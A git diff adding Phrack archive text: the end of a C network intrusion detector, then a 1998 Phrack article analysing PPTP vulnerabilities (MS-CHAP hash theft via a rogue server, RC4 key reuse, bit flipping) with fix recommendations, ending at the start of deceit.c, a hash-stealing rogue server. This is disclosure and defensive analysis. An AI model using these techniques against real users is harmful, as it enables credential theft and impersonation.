+    struct icmphdr *icmp;
+
+    icmp = (struct icmphdr *) pkt;
+    if(Gisfrag)	/* probable ICMP attack (i.e. Ping of Death) */
+    {
+	Gsi->icmpfrag.saddr = Gsaddr;
+	memcpy(Gsi->icmpfrag.eaddr, ep->h_source, ETH_ALEN);
+	Gsi->icmpfrag.atktime = Gtimein;
+    }
+    if(icmp->type == ICMP_ECHOREPLY)
+	Gsi->icmpcnt++;
+    return;
+}
+
+/**********************************************************************
+Function: clear_pkt
+
+Purpose:  Delete and free space for any old packets.
+**********************************************************************/
+void clear_pktin(si)
+struct scaninfo *si;
+{
+    struct pktin *pi;
+    struct floodinfo *fi, *tfi;
+    time_t t, t2;
+
+    t = time((time_t *)0);
+    while(si->tcpin)
+    {
+	t2 = t - si->tcpin->timein;
+	if(t2 > Gtimer)
+	{
+	    pi = si->tcpin;
+	    fi = pi->fi;
+	    while(fi)
+	    {
+		tfi = fi;
+		fi = fi->next;
+		free(tfi);
+	    }
+	    si->tcpin = pi->next;
+	    free(pi);
+	}
+	else
+	    break;
+    }
+    while(si->udpin)
+    {
+	t2 = t - si->udpin->timein;
+	if(t2 > Gtimer)
+	{
+	    pi = si->udpin;
+	    si->udpin = pi->next;
+	    free(pi);
+	}
+	else
+	    break;
+    }
+}
+
+/**********************************************************************
+Function: print_info
+
+Purpose:  Print out any alerts.
+**********************************************************************/
+void print_info()
+{
+    struct pktin *pi;
+    struct addrlist *tcplist = NULL, *udplist = NULL, *al;
+    struct floodinfo *fi;
+    char buf[1024], *eaddr, abuf[32];
+    int i;
+
+    strcpy(abuf, anetaddr(Gsi->addr));
+    if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS)
+    {
+        if(Gsi->teardrop.atktime)
+        {
+	    eaddr = ether_ntoa(Gsi->teardrop.eaddr);
+	    sprintf(buf, "Possible teardrop attack from %s (%s) against %s",
+	        anetaddr(Gsi->teardrop), eaddr, abuf);
+	    syslog(LOG_ALERT, buf);
+	    memset(&Gsi->teardrop, 0, sizeof(struct atk));
+        }
+        if(Gsi->land.atktime)
+        {
+	    eaddr = ether_ntoa(Gsi->land.eaddr);
+	    sprintf(buf, "Possible land attack from (%s) against %s",
+	        eaddr, abuf);
+	    syslog(LOG_ALERT, buf);
+	    memset(&Gsi->land, 0, sizeof(struct atk));
+        }
+        if(Gsi->icmpfrag.atktime)
+        {
+	    eaddr = ether_ntoa(Gsi->icmpfrag.eaddr);
+	    sprintf(buf, "ICMP fragment detected from %s (%s) against %s",
+	        anetaddr(Gsi->icmpfrag), eaddr, abuf);
+	    syslog(LOG_ALERT, buf);
+	    memset(&Gsi->icmpfrag, 0, sizeof(struct atk));
+        }
+        if(Gsi->icmpcnt > Gicmplimit)
+        {
+	    sprintf(buf, "ICMP ECHO threshold exceeded, smurfs up.  I saw %d packets\n", Gsi->icmpcnt);
+	    syslog(LOG_ALERT, buf);
+	    Gsi->icmpcnt = 0;
+        }
+    
+    }
+    for(pi = Gsi->tcpin; pi; pi = pi->next)
+    {
+	i = 0;
+	for(fi = pi->fi; fi; fi = fi->next)
+	    i++;
+    	
+	if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS)
+	{
+	    if(i > Gsynflood)
+	    {
+	        eaddr = ether_ntoa(pi->eaddr);
+	        sprintf(buf, "Possible SYNFLOOD from %s (%s), against %s.  I saw %d packets\n",
+		    anetaddr(pi->saddr), eaddr, abuf, i);
+	        syslog(LOG_ALERT, buf);
+	    }
+	}
+	for(al = tcplist; al; al = al->next)
+	{
+	    if(pi->saddr == al->saddr)
+	    {
+		al->cnt++;
+		if(pi->sport == 80)
+		    al->wwwcnt++;
+		break;
+	    }
+	}
+	if(al == NULL)	/* new address */
+	{
+	    al = (struct addrlist *)malloc(sizeof(struct addrlist));
+	    if(al == NULL)
+	    {
+		perror("Malloc address list");
+		exit(-1);
+	    }
+	    memset(al, 0, sizeof(struct addrlist));
+	    al->saddr = pi->saddr;
+	    al->cnt = 1;
+	    if(pi->sport == 80)
+		al->wwwcnt = 1;
+	    al->next = tcplist;
+	    tcplist = al;
+        }
+    }
+    if(Greportlevel == REPORTALL || Greportlevel == REPORTSCAN)
+    {
+        for(al = tcplist; al; al = al->next)
+        {
+	    if((al->cnt - al->wwwcnt) > Gportlimit || al->wwwcnt > Gwebcount)
+	    {
+	        sprintf(buf, "Possible TCP port scan from %s (%d ports) against %s\n",
+		    anetaddr(al->saddr), al->cnt, abuf);
+	        syslog(LOG_ALERT, buf);
+	    }
+        }
+
+        for(pi = Gsi->udpin; pi; pi = pi->next)
+        {
+	    for(al = udplist; al; al = al->next)
+	    {
+	        if(pi->saddr == al->saddr)
+	        {
+		    al->cnt++;
+		    break;
+	        }
+	    }
+	    if(al == NULL)	/* new address */
+	    {
+	        al = (struct addrlist *)malloc(sizeof(struct addrlist));
+	        if(al == NULL)
+	        {
+		    perror("Malloc address list");
+		    exit(-1);
+	        }
+	        memset(al, 0, sizeof(struct addrlist));
+	        al->saddr = pi->saddr;
+	        al->cnt = 1;
+	        al->next = udplist;
+	        udplist = al;
+	    }
+        }
+        for(al = udplist; al; al = al->next)
+        {
+	    if(al->cnt > Gportlimit)
+	    {
+	        sprintf(buf, "Possible UDP port scan from %s (%d ports) against %s\n",
+		    anetaddr(al->saddr), al->cnt, abuf);
+	        syslog(LOG_ALERT, buf);
+	    }
+        }
+    }
+
+    while(tcplist)
+    {
+	al = tcplist->next;
+	free(tcplist);
+	tcplist = al;
+    }
+    while(udplist)
+    {
+	al = udplist->next;
+	free(udplist);
+	udplist = al;
+    }
+}
+
+/************************************************************************
+Function:  anetaddr
+
+Description:
+
+Another version of the intoa function.
+************************************************************************/
+
+char *anetaddr(addr)
+u_long addr;
+{
+    u_long naddr;
+    static char buf[16];
+    u_char b[4];
+    int i;
+
+    naddr = ntohl(addr);
+    for(i = 3; i >= 0; i--)
+    {
+        b[i] = (u_char) (naddr & 0xff);
+        naddr >>= 8;
+    }
+    sprintf(buf, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);
+    return(buf);
+}
+
+/************************************************************************
+Function:  initdevice
+
+Description: Set up the network device so we can read it.
+
+**************************************************************************/
+initdevice(fd_flags, dflags)
+int fd_flags;
+u_long dflags;
+{
+    struct ifreq ifr;
+    int fd, flags = 0;
+
+    if((fd = socket(PF_INET, SOCK_PACKET, htons(0x0003))) < 0)
+    {
+	perror("Cannot open device socket");
+	exit(-1);
+    }
+
+    /* Get the existing interface flags */
+
+    strcpy(ifr.ifr_name, Gdevice);
+    if(ioctl(fd, SIOCGIFFLAGS, &ifr) < 0)
+    {
+	perror("Cannot get interface flags");
+	exit(-1);
+    }
+
+    ifr.ifr_flags |= IFF_PROMISC;
+    if(ioctl(fd, SIOCSIFFLAGS,  &ifr) < 0)
+    {
+	perror("Cannot set interface flags");
+	exit(-1);
+    }
+    
+    return(fd);
+}
+
+/************************************************************************
+Function:  readdevice
+
+Description: Read a packet from the device.
+
+**************************************************************************/
+u_char *readdevice(fd, pktlen)
+int fd;
+int *pktlen;
+{
+    int cc = 0, from_len, readmore = 1;
+    struct sockaddr from;
+    static u_char pktbuffer[PKTLEN];
+    u_char *cp;
+
+    while(readmore)
+    {
+	from_len = sizeof(from);
+	if((cc = recvfrom(fd, pktbuffer, PKTLEN, 0, &from, &from_len)) < 0)
+	{
+	    if(errno != EWOULDBLOCK)
+		return(NULL);
+	}
+	if(strcmp(Gdevice, from.sa_data) == 0)
+	    readmore = 0;
+    }
+    *pktlen = cc;
+    return(pktbuffer);
+}
+
+/*************************************************************************
+Function: ether_ntoa 
+
+Description:
+
+Translates a MAC address into ascii.  This function emulates
+the ether_ntoa function that exists on Sun and Solaris, but not on Linux.
+It could probably (almost certainly) be more efficent, but it will do.
+*************************************************************************/
+char *ether_ntoa(etheraddr)
+u_char etheraddr[ETH_ALEN];
+{
+    int i, j;
+    static char eout[32];
+    char tbuf[10];
+
+    for(i = 0, j = 0; i < 5; i++)
+    {
+	eout[j++] = etheraddr[i] >> 4;
+	eout[j++] = etheraddr[i] & 0xF;
+	eout[j++] = ':';
+    }
+    eout[j++] = etheraddr[i] >> 4;
+    eout[j++] = etheraddr[i] & 0xF;
+    eout[j++] = '\0';
+    for(i = 0; i < 17; i++)
+    {
+	if(eout[i] < 10)
+	    eout[i] += 0x30;
+	else if(eout[i] < 16)
+	    eout[i] += 0x57;
+    }
+    return(eout);
+}
+<-->
+----[  EOF
+
diff --git a/phrack53/12.txt b/phrack53/12.txt
new file mode 100644
index 0000000..9014a23
--- /dev/null
+++ b/phrack53/12.txt
@@ -0,0 +1,1416 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 12 of 15
+
+
+-------------------------[  The Crumbling Tunnel
+
+
+--------[  aleph1 <aleph1@underground.org>
+
+ 
+                          -[ The Crumbling Tunnel ]-
+                    < A Menagerie of PPTP Vulnerabilities >
+
+                          by aleph1@underground.org
+
+
+    Point-to-Point Tunneling Protocol (PPTP) is a new networking
+    technology that allows you to use the Internet as your own secure
+    virtual private network (VPN).  PPTP is integrated with the Remote
+    Access Services (RAS) server which is built into Windows NT Server.
+    With PPTP, your users can dial into a local ISP, or connect directly
+    to the Internet, and access their network just as easily and securely
+    as if they were at their desks.
+
+    < http://www.microsoft.com/communications/pptp.htm >
+
+
+-[ p r e f a c e ]-
+
+This paper is a compendium of the discussions between myself and a Microsoft
+representative during October 1996 and May 1997 on several NT security
+mailing lists, the research done by Counterpane System and published in the
+ paper "Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol
+(PPTP)" by B. Schneier and P. Mudge on June 1998, and a new vulnerability I
+have recently discovered.
+
+
+-[ i n t r o d u c t i o n ]-
+
+As stated above, the Point-to-Point Tunneling Protocol is Microsoft's attempt
+at creating a Virtual Private Network (VPN) protocol.  Given their past
+history in developing and implementing protocols, an analysis of PPTP for
+security vulnerabilities would certainly be an interesting endeavor.  The
+following is such an analysis.
+
+Although this analysis is technical in nature, I will not spend the time
+describing exactly how each protocol works.  I will assume you have done your
+homework and at least briefly glanced over the specifications for each of
+the protocols involved.
+
+PPTP is really a number of protocols cobbled together to make a whole.  The
+players are:
+
+  GRE	    - The Generic Encapsulation Protocol. The protocol is
+              defined in RFC 1701 and RFC 1702.  Microsoft has defined
+              their own extensions. They call their modifications
+              GRE v2.
+
+  PPP	    - The Point-to-Point Protocol.  The protocol is defined 
+              in RFC 1661.  The protocol is used for the transmission
+              of multi-protocol datagrams over point-to-point links.
+
+  PPTP	    - PPTP uses GRE to tunnel PPP and adds a connections setup
+              and control protocol over a TCP session. 
+
+  MS-CHAP   - This is Microsoft's variant of the more common PPP CHAP
+              authentication protocol.  It is a challenge response
+              authentication algorithm.  It supplies the challenge used
+              by MPPE (see below) to encrypt the session.  It also has
+              two sub-protocols for changing passwords.  It is defined in the
+              draft draft-ietf-pppext-mschap-00.txt.
+
+  MPPE      - Microsoft's Point-to-Point Encryption protocol.  This is
+              the protocol in charge of generating a session key and
+              encrypting the session. It is defined in the drafts
+              draft-ietf-pppext-mppe-00.txt and  draft-ietf-pppext-mppe-01.txt.
+
+< PPTP in a nutshell >
+
+PPTP creates a connection setup and control channel using TCP to the PPTP
+server (Microsoft's RAS).  Using this connection, PPTP establishes a new GRE
+tunnel which will carry PPP packets from the client to the server.  The client
+will authenticate to the server via PPP's negotiation mechanism using MS-CHAP
+and will then encrypt all PPP data packets using MPPE.
+
+Enough acronyms for you?  Lets get dirty.
+
+
+-[ P P T P ]-
+
+PPTP creates a connection setup and control channel to the server using TCP.
+Originally the TCP port used was 5678.  Later on it was changed to 1723.  This
+is the IANA assigned port number.  The control connection is not authenticated
+in any way.  It is easy for Mallory (the malicious interloper) to take over
+the connection via TCP hijacking techniques.  She can then issue Stop Session
+Request commands.  This will close the control channel and at the same time all
+active calls (tunnels) will be cleared.
+
+
+-[ G R E ]-
+
+PPP packets are encapsulated in GRE and tunneled on top of IP.  GRE uses IP
+protocol number 47.  GRE packets are similar in some respects to TCP segments.
+They both may carry a sequence and acknowledgement number.  GRE also uses a
+sliding window to avoid congestion.
+
+This has some important implications.  It means that if we want to spoof PPP
+packets encapsulated in GRE, we will desynchronize the GRE channel.  A
+possible way around this is the use of the "S" flag in the GRE header.  This
+flag tells the end point if the GRE packet has a sequence number.  It is
+possible that a badly coded implementation will accept a GRE packet with data
+even if it does not have a sequence number.  This is because in the original
+GRE standard the use of sequence numbers was optional.  Furthermore, the
+specification does not mention how an end system should act if it receives a
+GRE packet with a duplicate sequence number.  It may simply discard it and
+send another acknowledgement.  This would mean we do not need to resynchronize
+GRE at all.  The other end will send an acknowledgement for the packet we
+spoofed and the encapsulated PPP should not become desynchronized.  As of this
+writing I haven't yet tested this possibility.
+
+It is also interesting to note that the original GRE specification has many
+options to do things like source routing which are left as implementation
+specific.  If you open a hole in your firewall for GRE just so you can use
+PPTP you might be letting in more than you think.  This area needs further
+investigation.
+
+
+-[ M S - C H A P ]-
+
+MS-CHAP is a challenge response protocol.  The server send the client an 8
+byte challenge.  The client computes a response by encrypting the challenge
+with the NT one way hash and then with the LANMAN one way hash.
+
+
+< Dictionary Attack >
+
+Like most other challenge/response protocols, this one is vulnerable to a
+dictionary by such tools as L0phtcrack.  As Schneier and Mudge describe in
+their paper, the LANMAN based response is easier to crack than it normally is
+because here it is divided into three pieces which are encrypted independently.
+This allows for a speed up in breaking the password.  Please see their paper
+for a detailed explanation of the process.
+
+The PPTP Performance update for Windows NT 4.0 (PPTP2-FIX) stops the PPTP
+Windows NT client from sending the LANMAN hash based response if the client
+is configured to use 128-bit encryption.  The same fix also allows the server
+to reject PPTP clients that attempt to authenticate using the LANMAN hash
+based response.
+
+
+< Stealing the Password >
+
+MS-CHAP has two sub-protocols for changing password.  In version one the
+client encrypts the new and old hashes (NT and LANMAN) with the challenge
+the server sent over the wire.  A passive attacker can simply decrypt the
+hashes and steal them.
+
+Version two encrypts the new hashes with the old hashes and encrypts the old
+hashes with the new hashes.  Only the server, which knows the old hashes,
+will be able to decrypt the new hashes and use these to decrypt the old
+hashes and verify the user's identity.
+
+As I recently discovered, this feature of MS-CHAP can be used to steal the
+user's password hashes if Mallory can masquerade as the PPTP server.  Several
+methods to masquerade as the server come into mind, including DNS hijacking
+and RIP spoofing.  Once the unsuspecting user connects to Mallory's rogue
+server and attempts to authenticate she will return a ERROR_PASSWD_EXPIRE
+error to the user and tell the client to use the older version of the
+password change sub-protocol.  The user will then be prompted by the PPTP
+client to enter his old and new password.  The client will proceed to send
+the new and old password hashes, LANMAN and NT, encrypted with the challenge
+the rouge server sent.  Now Mallory can use the hashes to logon into the real
+PPTP server and impersonate the user.
+
+The MS-CHAP draft deprecates the use of the change password version 1 protocol
+but Microsoft's implementation continue to support it.  This vulnerability was
+verified using Windows NT's RAS PPTP client with the PPTP Performance Update
+(PPTP2-FIX) installed.  At the end you will find some source code that
+implements a demonstration PPTP server that asks the user to change passwords
+using the older protocol and prints the stolen hashes on the screen.
+
+
+-[ M P P E ]-
+
+The are two drafts for MPPE. I'll discuss the earlier one first.
+
+MPPE uses RC4, a stream cipher, to encrypt the PPP datagrams.  MPPE is
+negotiated as a compression protocol as part of PPP's Link Control Protocol
+negotiation.
+
+
+< Session Keys >
+
+MPPE currently supports 40 and 128 bit session keys, although more key lengths
+can be defined.  The 40-bit session key is derived from the first 8 bytes of
+the LANMAN hash. The session key will be the same for all sessions until the
+user changes his password.
+
+The 128-bit session key is created by taking the first 16 bytes of the MD4
+hash and the first 16 bytes of the NT hash, and then hashing them with the
+servers challenge.  Microsoft claims that they hash the NT hash to protect it.
+I fail to see their point.  The password hash, nor it's hash, ever go over the
+wire.  Why they selected this algorithm remains a mystery.
+
+The new MPPE draft adds an option to use a 40-bit key derived from the NT hash.
+
+As Schneier and Mudge point out, it is misleading to say MPPE provides
+128-bit, or even 40-bit, security.  The 40-bit LANMAN based session key is
+derived from the password only, and as such will have a much lower entropy
+than a random 40-bit key.  The 128-bit and 40-bit NT hash based session keys
+are derived from both the users password and the server's challenge.
+Depending on how good the server's random number generator is, the session
+key may have a much lower entropy than 128 or 40 bits.  A study of how
+Microsoft's PPTP server, and NT in general, generates random numbers would
+be interesting.  The only way to guarantee the full strength of the key is by
+generating it with a good RNG.
+
+
+< Attacking PPP >
+
+As Schneier and Mudge also point, out only PPP packets with protocol numbers
+between 0x21 and 0xFA are encrypted (in essence only data packets are
+encrypted). In contrast, the PPP Encryption Control Protocol (RFC 1968)
+encrypts all packets other than LCP packets after ECP is negotiated.
+
+This means Mallory can spoof Network Control Protocol packets with impunity.
+It also means she can obtain some useful information by simply sniffing the
+NCP packets.  Things like whether the internal network uses IP, IPX, or
+NetBIOS, the internal IP address of the PPTP client, NetBIOS names, the IP
+address of internal WINS and DNS servers, the clients internal IPX node
+number and other things.  Read the IPCP (RFC 13320, NBFCP (RFC 2097) and
+IPXCP (RFC 1552) specifications for more information.
+
+
+< Breaking RC4 >
+
+Stream ciphers, like RC4, are susceptible to attack if two or more plaintexts
+are encrypted with the same key.  If you take two ciphertexts encrypted with
+the same key and xor them together you will obtain the two plaintexts xor'ed
+together.  If you can make an educated guess as to the structure and contents
+of part of one of the plaintexts you will be able to obtain the corresponding
+plaintext in the other message.
+
+MPPE is susceptible to such an attack.  As mentioned above the 40-bit session
+key is the same in each session.  Mallory can passively monitor the network
+and collect many sessions, all encrypted with the same key that she can then
+attempt to break.  The problem is compounded since she has learned things
+like the clients internal IP address and its NetBIOS name which will be in
+the encrypted packets by monitoring the NCP PPP packets.
+
+MPPE uses the same key in each direction.  For each session at least two
+packets, one inbound and one outbound, will be encrypted with the same key.
+In this way, even traffic protected by the 128-bit unique session key can be
+attacked.
+
+MPPE being a sub-protocol of PPP, a datagram protocol, does not expect a
+reliable link.  Instead it maintains a 12-bit coherency count that is
+increased for each packet to keep the encryption tables synchronized.  Each
+time the low order byte of the coherency count equals 0xFF (every 256 packets)
+the session key is regenerated based on the original session key and the
+current session key.
+
+If MPPE ever sees a packet with a coherency that it is not expecting it
+sends a CCP Reset-Request packet to the other end.  The other end, upon seeing
+this packet, will re-initialize the RC4 tables using the current session key.
+The next packet it sends will have the flushed bit set.  This bit will
+indicate to the other end that it should re-initialize its own tables.  In
+this way they become resynchronized.  This mode of operation is called
+"stateful mode" in the new MPPE draft.
+
+What does this all mean to us?  Well, it means we can force both ends of the
+connection to keep encrypting their packets with the same key until the low
+order sequence number reaches 0xFF.  For example assume Alice and Bob have
+just set up the communication channel.  They both have initialized their
+session keys and expect a packet with a coherency count of zero.
+
+Alice           ->      Bob
+
+Alice sends Bob a packet numbered zero encrypted with the cipher stream
+generated by the RC4 cipher and increments her sent coherency count to one.
+Bob receives the packet, decrypts it, and increments his receive coherency
+count to 1.
+
+Mallory (Bob)   ->      Alice
+
+Mallory sends Alice a spoofed (remember this is datagram protocol - assuming
+we don't desynchronize GRE) CCP Reset-Request packet.  Alice immediately
+re-initializes her RC4 tables to their original state.
+
+Alice           ->      Bob
+
+Alice sends another packet to Bob.  This packet will be encrypted with the
+same cipherstream as the last packet.  The packet will also have the FLUSHED
+bit set.  This will make Bob re-initialize its own RC4 tables.
+
+Mallory can continue to play this game up to a total of 256 times after
+which the session key will be changed.  By this point Mallory will have
+collected 256 packets from Alice to Bob all encrypted with the same cipher
+stream.
+
+Furthermore, since Alice and Bob start with the same session key in each
+direction Mallory can play the same game in the opposite direction collecting
+another 256 packets encrypted with the same cipher stream as the ones going
+from Alice to Bob.
+
+The Apr 1998 version of the draft adds a "stateless mode" option (otherwise
+known as "historyless mode" in some Microsoft literature) to the negotiation
+packets.  This option tells MPPE to change the session key after every packet
+and to ignore all this CCP Reset-Request and flushed bit business.  This
+option was introduced to improve PPTP's performance.  Although re-keying
+after each packet cuts the cipher performance by almost half, now PPTP no
+longer has to wait a whole round trip time to resynchronize.  This, in effect
+improves the performance of PPTP and at the same time made the attack I
+describe above useless.
+
+This new stateless mode was incorporated in the PPTP Performance Update for
+Windows NT 4.0 (PPTP2-FIX).
+
+
+< Bit Flipping >
+
+Schneier and Mudge describe a bit flipping attack in their paper.  Because of
+the properties of the RC4 cipher as used within MPPE an attacker can flip
+bits in the ciphertext that will be decrypted correctly by MPPE.  In this way
+an attacker can modify encrypted packets while they are in transit.
+
+
+-[ i m p l e m e n t a t i o n   b u g s ]-
+
+Schneier and Mudge describe a number of implementation bugs in Microsoft's
+PPTP control channel that crashed Windows NT with the Blue Screen of Death.
+Keving Wormington has found similar problem as posted some demonstration
+code to the BugTraq mailing list in Nov 1997.  Microsoft claims to have fixed
+this or similar problems in their PPTP-FIX hotfix.
+
+Schneier and Mudge also found that the Windows 95 client does not zero fill
+its buffers and leaks information in its protocol packets.
+
+A bug in the PPTP server allows clients to remain connected while packets
+are transmitted in the clear if the encryption negotiation between the
+client and server fails.  This problem is documented in Microsoft's Knowledge
+Base article Q177670.  They claim to have fixed it in the PPTP-FIX hotfix.
+
+-[ f i x i n g   t h i n g s ]-
+
+It is interesting to note that Microsoft has chosen to omit certain
+vulnerabilities from their response to the Counterpane paper.  Let's summarize
+them here so they don't get confused:
+
+---> The control connection is not authenticated.
+
+   Microsoft claims they will enhance the control channel in future updates
+   to authenticate each control packet.
+
+---> The MS-CHAP LANMAN hash response is vulnerable to a dictionary attack
+---| that can be speed up enormously.
+
+   The PPTP Performance Update for Windows NT 4.0 has added the option
+   to reject PPTP clients that attempt to use the LANMAN based response.
+   It also stops the Windows NT PPTP client from sending the LANMAN
+   based response when it is configured to require 128-bit encryption.
+   This is of little comfort to non-US customers that cannot use the
+   128-bit version of the software.  Microsoft claims to be testing
+   a Windows 95 client update, possibly DUN 1.3, that will stop clients
+   from sending the LANMAN response.  The only way for Microsoft to 
+   completely get rid of the 40-bit LANMAN hash based key and support
+   non-US customers is for them to implement the 40-bit NT hash based
+   session key introduced in the second MPPE draft.
+   
+---> The MS-CHAP NT hash response is vulnerable to a dictionary attack.
+
+   They must not use the password for authentication. Some sort of
+   public key protocol would fix the problem.
+
+---> A attacker can steal a users password hashes via the MS-CHAP password
+---| change protocol version one.
+
+   They update all the clients to stop responding to password change
+   requests using version one of the protocol.
+
+---> The 40-bit LANMAN hash based session key is the same across sessions.
+---> MPPE does not provide true 128-bit or 40-bit security.
+
+   Microsoft simply recommends that customers enforce a strong password 
+   policy. They should instead modify PPTP to generate truly random
+   keys. 
+
+---> MPPE does not encrypt Network Control Protocol PPP packets.
+
+   NCP packets should be encrypted.
+
+---> MPPE uses the same key in both directions.
+
+   Each direction must be started with a different key.
+
+---> MPPE is vulnerable to a Reset-Request attack.
+
+   Microsoft has fixed this problem in the latest PPTP draft by introducing
+   the stateless mode. The PPTP Performance Update for Windows NT 4.0 
+   implements this mode of operation. There is no solution for Windows 95 yet.
+   This means that if you have Windows 95 PPTP clients you are still vulnerable.
+
+---> MPPE is vulnerable to bit flipping attacks.
+
+   They must add a MAC to each packet or use a cipher other than RC4 that
+   does not exhibit this property.
+
+---> There are a number of denial of service and other vulnerabilities 
+---| caused by implementation errors.
+
+   Microsoft claims to have fixed some of this problems with 
+   PPTP-FIX and PPTP2-FIX.
+
+At least Microsoft should produce an Windows NT and Windows 95 PPTP update
+that does not use the same session keys in each direction, that does not
+support MS-CHAP password change protocol version one, does not send the send
+to LANMAN based response and supports the 40-bit NT hash based session key.
+
+
+-[ f u t u r e   d i r e c t i o n s ]-
+
+Microsoft's VPN strategy appears to be moving away from PPTP and going to
+Layer Two Tunneling Protocol (L2TP) and IPsec.  L2TP (currently an IETF
+draft) is a compromise between Cisco's Layer Two Forwarding (L2F), (a
+competing protocol) and PPTP.  This is certain to take a long time and they
+will probably support PPTP for backwards compatibility.
+
+L2TP is somewhat similar to PPTP.  L2TP uses UDP instead of GRE to tunnel the
+PPP packets.  Connection setup and control packets are carried within UDP.
+The protocol provides for the authentication of the control session via a
+shared secret and a challenge/response exchange.  It also provides the for
+the hiding of sensitive information, such as username and password, by
+encrypting it.
+
+Other than those simply security mechanism L2TP does not provide any
+security.  To operate L2TP in a secure manner you must use it with either
+IPsec to provide authentication and confidentiality of all IP packets, or by
+using PPP layer security.  If the former is chosen beware that the control
+packets can be spoofed after the authentication phase.
+
+If Microsoft decides to go with the later choice (possible because Windows
+98 will not have support for IPsec), they are well advised not to use MPPE
+and MS-CHAP as this would make L2TP almost as vulnerable as PPTP.  They would
+do better implementing ECP and some of the PPP Extensible Authentication
+Protocol (RFC 2284) options.
+
+For a discussion of L2TP security read the Security Considerations section
+of the L2TP draft.
+
+
+-[ m i s c e l l a n e o u s ]-
+
+The are a few interesting projects related to PPTP.
+
+-> Linux PPTP Masquerading
+< http://bmrc.berkeley.edu/people/chaffee/linux_pptp.html >
+
+Here you will find patches to the Linux kernel to support masquerading of
+PPTP connections.
+
+-> PPTP Client for Linux
+< http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/ >
+
+Here you will find a free PPTP client implementation for Linux that should
+be easy to port to other platforms.
+
+
+-[ s u m m a r y ]-
+
+PPTP is a layer two tunneling protocol designed by Microsoft and some other
+vendors.  The protocol and in particular Microsoft's implementation have a
+number of vulnerabilities not completely fixed by the their latest software
+patches and draft revisions.
+
+PPTP will most likely stop most amateurs but by no means provides air tight
+security.  If you have some serious security needs we recommend you look at
+some other solution.
+
+The Layer Two Tunneling Protocol being defined within the IETF evolved from
+PPTP and Cisco's Layer Two Forwarding.  It has obviously benefited from the
+peer review it has had within the IETF as it looks like much better protocol
+than PPTP.  If combined with IPsec, L2TP looks like a promising solution.
+
+
+-[ r e f e r e n c e s ]-
+
+Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP)
+by B. Schneier and P. Mudge
+< http://www.counterpane.com/pptp.html >
+
+Generic Routing Encapsulation (GRE) (RFC 1701)
+< ftp://ds.internic.net/rfc/rfc1701.txt >
+
+Generic Routing Encapsulation over IPv4 networks (RFC 1702)
+< ftp://ds.internic.net/rfc/rfc1702.txt >
+
+Layer Two Tunneling Protocol "L2TP" (May 1996)
+< http://www.ietf.org/internet-drafts/draft-ietf-pppext-l2tp-11.txt >
+
+Microsoft Point-To-Point Encryption (MPPE) Protocol (March 1998)
+< http://www.apocalypse.org/pub/internet-drafts/draft-ietf-pppext-mppe-00.txt >
+
+Microsoft Point-To-Point Encryption (MPPE) Protocol (April 1998)
+< http://www.ietf.org/internet-drafts/draft-ietf-pppext-mppe-01.txt >
+
+Microsoft PPP CHAP Extensions
+< http://www.ietf.org/internet-drafts/draft-ietf-pppext-mschap-00.txt >
+
+Point-to-Point Tunneling Protocol 
+< http://www.microsoft.com/communications/pptp.htm >
+
+Point-to-Point Tunneling Protocol (PPTP) Technical Specification (Feb, 22 1996)
+< http://hooah.com/workshop/prog/prog-gen/pptp.htm >
+
+Point-to-Point Tunneling Protocol--PPTP (Draft July 1997)
+< http://www.microsoft.com/communications/exes/draft-ietf-pppext-pptp-01.txt >
+
+PPTP and Implementation of Microsoft Virtual Private Networking
+< http://www.microsoft.com/communications/nrpptp.htm >
+
+PPTP Performance Update for Windows NT 4.0 Release Notes
+< http://support.microsoft.com/support/kb/articles/q167/0/40.asp >
+
+PPTP Security - An Update
+< http://www.microsoft.com/communications/pptpfinal.htm >
+
+RRAS Does Not Enforce String Encryption for DUN Clients
+< http://support.microsoft.com/support/kb/articles/q177/6/70.asp >
+
+STOP 0x0000000A in Raspptpe.sys on a Windows NT PPTP Server
+< http://support.microsoft.com/support/kb/articles/q179/1/07.asp >
+
+The Point-to-Point Protocol (PPP) (RFC 1661)
+< ftp://ftp.isi.edu/in-notes/rfc1661.txt >
+
+The PPP DES Encryption Protocol (DESE) (RFC 1969)
+< ftp://ftp.isi.edu/in-notes/rfc1969.txt >
+
+The PPP Encryption Control Protocol (ECP) (RFC 1968)
+< ftp://ftp.isi.edu/in-notes/rfc1968.txt >
+
+The PPP Internetwork Packet Exchange Control Protocol (IPXCP) 9rFC 1552)
+< ftp://ftp.isi.edu/in-notes/rfc1552.txt >
+
+The PPP NetBIOS Frames Control Protocol (NBFCP) (RFC 2097)
+< ftp://ftp.isi.edu/in-notes/rfc2097.txt >
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+<++> PPTP/deceit.c
+/*
+ * deceit.c by Aleph One
+ *
+ * This program implements enough of the PPTP protocol to steal the
+ * password hashes of users that connect to it by asking them to change
+ * their password via the MS-CHAP password change protocol version 1.
+ *
+ * The GRE code, PPTP structures and defines were shamelessly stolen from
+ * C. Scott Ananian's <cananian@alumni.princeton.edu> Linux PPTP client
+ * implementation.
+ *
+ * This code has been tested to work againts Windows NT 4.0 with the 
+ * PPTP Performance Update. If the user has selected to use the same
+ * username and password as the account they are currently logged in
+ * but enter a different old password when the PPTP client password
+ * change dialog box appears the client will send the hash for a null
+ * string for both the old LANMAN hash and old NT hash.
+ *
+ * You must link this program against libdes. Email messages asking how 
+ * to do so will go to /dev/null.
+ *
+ * Define BROKEN_RAW_CONNECT if your system does not know how to handle
+ * connect() on a raw socket. Normally if you use connect with a raw
+ * socket you should only get from the socket IP packets with the
+ * source address that you specified to connect(). Under HP-UX using
+ * connect makes read never to return. By not using connect we
+ * run the risk of confusing the GRE decapsulation process if we receive
+ * GRE packets from more than one source at the same time.
+ */
+
+#include <stdio.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <sys/socket.h>
+#include <signal.h>
+#include <unistd.h>
+
+#include "des.h"
+
+#ifdef __hpux__
+#define u_int8_t uint8_t
+#define u_int16_t uint16_t
+#define u_int32_t uint32_t
+#endif
+
+/* define these as appropiate for your architecture */
+#define hton8(x)  (x)
+#define ntoh8(x)  (x)
+#define hton16(x) htons(x)
+#define ntoh16(x) ntohs(x)
+#define hton32(x) htonl(x)
+#define ntoh32(x) ntohl(x)
+
